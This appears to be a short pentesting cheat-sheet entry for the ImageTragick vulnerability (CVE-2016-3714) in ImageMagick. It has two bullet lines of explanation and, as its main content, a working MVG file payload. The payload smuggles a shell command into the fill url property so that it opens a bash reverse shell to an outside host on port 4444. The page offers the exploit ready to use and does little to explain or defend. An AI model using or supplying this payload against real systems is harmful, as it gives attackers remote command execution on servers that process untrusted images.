ImageMagick

ImageTragick-CVE-2016-3714

  • The exploit involves injecting arbitrary shell commands via the fill property.

  • The vulnerability primarily affects the following formats:SVG,EPS,MVG,PDF,XML 

push graphic-context
viewbox 0 0 640 480
fill 'url(https://1.1.1.1/tokyo.jpg"|bash -i >& /dev/tcp/10.10.16.5/4444 0>&1;echo "yay)'
pop graphic-context

PreviousOpenNetAdminNextVulnerabilities

Last updated